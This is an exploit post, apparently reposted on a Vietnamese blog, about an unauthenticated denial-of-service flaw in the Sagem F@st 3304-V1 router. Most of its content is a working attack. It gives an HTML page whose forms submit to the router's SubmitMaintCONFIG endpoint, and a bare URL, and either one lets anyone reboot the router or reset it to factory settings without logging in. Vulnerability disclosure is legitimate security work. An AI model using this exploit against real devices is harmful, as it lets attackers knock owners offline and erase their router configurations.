Bài liên quan
# Title              : Sagem F@st 3304-V1 denial of service Vulnerability
# Vendor Homepage    : http://www.sagemcom.com
# Tested on          : Firefox, Google Chrome
# Tested Router      : Sagem F@st 3304-V1
# Date               : 2014-07-26
# Author             : Z3ro0ne
# Contact            : saadousfar59@gmail.com
# Facebook Page      : https://www.facebook.com/Z3ro0ne
 
# Vulnerability description :
the Vulnerability allow unauthenticated users to remotely restart and reset the router
# Exploit:
 
<html>
<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
<body>
<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
    <INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
  </FORM>
  <FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
    <INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
  </FORM>
</body>
</html>
Reset to factory configuration :
--- Using Google Chrome browser :
to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar

Post a Comment

 
Top

Nhận xét mới đăng tải!

Loading…
X